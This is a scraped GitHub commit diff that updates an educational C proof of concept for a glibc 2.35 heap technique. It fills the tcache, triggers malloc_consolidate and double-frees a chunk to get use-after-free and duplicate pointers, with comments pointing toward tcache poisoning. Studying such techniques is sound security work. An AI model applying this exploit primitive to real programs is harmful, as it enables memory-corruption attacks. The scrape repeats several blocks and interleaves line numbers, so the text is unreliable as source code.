You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
merges all fastbin chunks with their neighbors, puts them in the unsorted bin and merges them with top
14
+
if possible.
15
+
16
+
As of glibc version 2.35 it is called only in the following five places:
17
+
1. _int_malloc: A large sized chunk is being allocated (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3965)
18
+
2. _int_malloc: No bins were found for a chunk and top is too small (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4394)
19
+
3. _int_free: If the chunk size is >= FASTBIN_CONSOLIDATION_THRESHOLD (65536) (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4674)
merges all fastbin chunks with their neighbors, puts them in the unsorted bin and merges them with top
14
+
if possible.
15
+
16
+
As of glibc version 2.35 it is called only in the following five places:
17
+
1. _int_malloc: A large sized chunk is being allocated (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3965)
18
+
2. _int_malloc: No bins were found for a chunk and top is too small (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4394)
19
+
3. _int_free: If the chunk size is >= FASTBIN_CONSOLIDATION_THRESHOLD (65536) (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4674)
merges all fastbin chunks with their neighbors, puts them in the unsorted bin and merges them with top
14
+
if possible.
15
+
16
+
As of glibc version 2.35 it is called only in the following five places:
17
+
1. _int_malloc: A large sized chunk is being allocated (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3965)
18
+
2. _int_malloc: No bins were found for a chunk and top is too small (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4394)
19
+
3. _int_free: If the chunk size is >= FASTBIN_CONSOLIDATION_THRESHOLD (65536) (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4674)
puts("This is a powerful technique that bypasses the double free check in tcachebin.");
8
-
printf("Fill up the tcache list to force the fastbin usage...\n");
32
+
printf("This technique will make use of malloc_consolidate and a double free to gain a UAF / duplication in the tcache.\n");
33
+
printf("It would also allow us to perform tcache poisoning.\n\n");
34
+
35
+
printf("Lets fill up the tcache to force fastbin usage...\n\n");
9
36
10
37
void*ptr[7];
11
38
@@ -14,30 +41,52 @@ int main() {
14
41
for(inti=0; i<7; i++)
15
42
free(ptr[i]);
16
43
44
+
// void* ppoison = malloc(0x400);
45
+
// ^ We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
46
+
17
47
void*p1=calloc(1,0x40);
48
+
// Using calloc here doesn't take from the tcache since calloc calls _int_malloc (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3679)
49
+
// and taking from the tcache is handled in __libc_malloc. If we used malloc(0x40) the chunk would get taken from the tcache.
18
50
19
51
printf("Allocate another chunk of the same size p1=%p \n", p1);
20
-
printf("Freeing p1 will add this chunk to the fastbin list...\n\n");
52
+
printf("Freeing p1 will add it to the fastbin.\n\n");
21
53
free(p1);
22
54
23
55
void*p3=malloc(0x400);
24
-
printf("Allocating a tcache-sized chunk (p3=%p)\n", p3);
25
-
printf("will trigger the malloc_consolidate and merge\n");
26
-
printf("the fastbin chunks into the top chunk, thus\n");
27
-
printf("p1 and p3 are now pointing to the same chunk !\n\n");
56
+
57
+
// free(ppoison);
58
+
// We can now free this chunk to put it in the tcache bin for the poison.
59
+
60
+
printf("To trigger malloc_consolidate we need to allocate a chunk with large chunk size (>= 0x400)\n");
61
+
printf("which corresponds to request size >= 0x3f0. We will request 0x400 bytes, which will gives us\n");
62
+
printf("a tcache-sized chunk with chunk size 0x410. p3=%p\n", p3);
63
+
64
+
printf("\nmalloc_consolidate will merge the fast chunk p1 with top.\n");
65
+
printf("p3 is allocated from top since there is no bin bigger than it. Thus, p1 = p3.\n");
28
66
29
67
assert(p1==p3);
30
68
31
-
printf("Triggering the double free vulnerability!\n\n");
32
-
free(p1);
69
+
printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p3).\n\n");
70
+
free(p1);// vulnerability
33
71
72
+
printf("So p1 is double freed, and p3 hasn't been freed although it now points to a free chunk.\n");
73
+
printf("We have thus achieved UAF on tcache!\n");
74
+
75
+
// *(long long*)p3 = target;
76
+
// We can use the UAF here to perform tcache poison.
77
+
78
+
printf("We will request a chunk of size 0x400, this will give us the 0x410 chunk thats currently in\n");
79
+
printf("the tcache bin. p3 and p1 will still be pointing to it.\n");
34
80
void*p4=malloc(0x400);
35
81
36
82
assert(p4==p3);
37
83
38
-
printf("The double free added the chunk referenced by p1 \n");
39
-
printf("to the tcache thus the next similar-size malloc will\n");
40
-
printf("point to p3: p3=%p, p4=%p\n\n",p3, p4);
84
+
printf("We now have two pointers (p3 and p4) that haven't been directly freed\n");
85
+
printf("and both point to the same tcache sized chunk. p3=%p p4=%p\n", p3, p4);
86
+
printf("We have achieved duplication!\n\n");
87
+
88
+
printf("Note: This duplication would have also worked with a larger chunk size, the chunks would\n");
89
+
printf("have behaved the same, just being taken from the top instead of from the tcache bin.");
merges all fastbin chunks with their neighbors, puts them in the unsorted bin and merges them with top
14
+
if possible.
15
+
16
+
As of glibc version 2.35 it is called only in the following five places:
17
+
1. _int_malloc: A large sized chunk is being allocated (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3965)
18
+
2. _int_malloc: No bins were found for a chunk and top is too small (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4394)
19
+
3. _int_free: If the chunk size is >= FASTBIN_CONSOLIDATION_THRESHOLD (65536) (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4674)
puts("This is a powerful technique that bypasses the double free check in tcachebin.");
8
-
printf("Fill up the tcache list to force the fastbin usage...\n");
32
+
printf("This technique will make use of malloc_consolidate and a double free to gain a UAF / duplication in the tcache.\n");
33
+
printf("It would also allow us to perform tcache poisoning.\n\n");
34
+
35
+
printf("Lets fill up the tcache to force fastbin usage...\n\n");
9
36
10
37
void*ptr[7];
11
38
@@ -14,30 +41,52 @@ int main() {
14
41
for(inti=0; i<7; i++)
15
42
free(ptr[i]);
16
43
44
+
// void* ppoison = malloc(0x400);
45
+
// ^ We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
46
+
17
47
void*p1=calloc(1,0x40);
48
+
// Using calloc here doesn't take from the tcache since calloc calls _int_malloc (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3679)
49
+
// and taking from the tcache is handled in __libc_malloc. If we used malloc(0x40) the chunk would get taken from the tcache.
18
50
19
51
printf("Allocate another chunk of the same size p1=%p \n", p1);
20
-
printf("Freeing p1 will add this chunk to the fastbin list...\n\n");
52
+
printf("Freeing p1 will add it to the fastbin.\n\n");
21
53
free(p1);
22
54
23
55
void*p3=malloc(0x400);
24
-
printf("Allocating a tcache-sized chunk (p3=%p)\n", p3);
25
-
printf("will trigger the malloc_consolidate and merge\n");
26
-
printf("the fastbin chunks into the top chunk, thus\n");
27
-
printf("p1 and p3 are now pointing to the same chunk !\n\n");
56
+
57
+
// free(ppoison);
58
+
// We can now free this chunk to put it in the tcache bin for the poison.
59
+
60
+
printf("To trigger malloc_consolidate we need to allocate a chunk with large chunk size (>= 0x400)\n");
61
+
printf("which corresponds to request size >= 0x3f0. We will request 0x400 bytes, which will gives us\n");
62
+
printf("a tcache-sized chunk with chunk size 0x410. p3=%p\n", p3);
63
+
64
+
printf("\nmalloc_consolidate will merge the fast chunk p1 with top.\n");
65
+
printf("p3 is allocated from top since there is no bin bigger than it. Thus, p1 = p3.\n");
28
66
29
67
assert(p1==p3);
30
68
31
-
printf("Triggering the double free vulnerability!\n\n");
32
-
free(p1);
69
+
printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p3).\n\n");
70
+
free(p1);// vulnerability
33
71
72
+
printf("So p1 is double freed, and p3 hasn't been freed although it now points to a free chunk.\n");
73
+
printf("We have thus achieved UAF on tcache!\n");
74
+
75
+
// *(long long*)p3 = target;
76
+
// We can use the UAF here to perform tcache poison.
77
+
78
+
printf("We will request a chunk of size 0x400, this will give us the 0x410 chunk thats currently in\n");
79
+
printf("the tcache bin. p3 and p1 will still be pointing to it.\n");
34
80
void*p4=malloc(0x400);
35
81
36
82
assert(p4==p3);
37
83
38
-
printf("The double free added the chunk referenced by p1 \n");
39
-
printf("to the tcache thus the next similar-size malloc will\n");
40
-
printf("point to p3: p3=%p, p4=%p\n\n",p3, p4);
84
+
printf("We now have two pointers (p3 and p4) that haven't been directly freed\n");
85
+
printf("and both point to the same tcache sized chunk. p3=%p p4=%p\n", p3, p4);
86
+
printf("We have achieved duplication!\n\n");
87
+
88
+
printf("Note: This duplication would have also worked with a larger chunk size, the chunks would\n");
89
+
printf("have behaved the same, just being taken from the top instead of from the tcache bin.");
0 commit comments